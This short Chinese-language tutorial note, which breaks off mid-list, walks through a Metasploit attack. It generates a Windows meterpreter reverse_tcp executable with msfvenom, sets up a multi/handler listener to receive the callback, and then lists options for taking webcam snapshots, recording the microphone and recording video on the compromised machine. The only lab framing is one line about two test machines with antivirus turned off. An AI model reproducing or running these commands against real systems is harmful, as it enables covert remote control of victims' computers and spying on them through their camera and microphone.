条件:两台试验机在同一网段,目标机关闭杀毒软件
步骤:msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx lport=xxx -f exe -o /root/xxx.exe
lhost=xxx --主机ip
lport=xxx --监听端口(自定义)
-f exe --文件格式为exe格式
-o /root/payload.exe
msfconsole --启动主控端
use exploit /multi/handler --使用handler作为主动端
set payload windows/meterpreter/reverse_tcp --设置payload为反向远程控制程序名称
set lhost --设置监听ip
set lport --设置监听端口
exploit
-h:显示帮助。
-i :要使用的网络摄像头的索引号。
-p :JPEG图像文件路径。默认为HOME / [随机乱码名字] .jpeg
-q:JPEG图像质量,默认为“50”
-v:自动查看JPEG图像,默认为“true”
record_mic --录音
-h:显示帮助。
-d :记录的秒数,默认为1秒
-F :wav文件路径。默认为HOME / [随机乱码名字] .wav
-p :自动播放捕获的音频,默认为“true”
run webcam --录像
-h:显示帮助横幅。
-d :循环延迟间隔(以毫秒为单位),默认为1000
-f:只抓一帧
-g:发送到GUI而不是写入文件
-i :默认情况下使用的网络摄像头的索引1
-l:默认情况下保持循环捕获(无用)
-p :默认情况下,文件夹映像的路径将保存在当前工作目录中
-q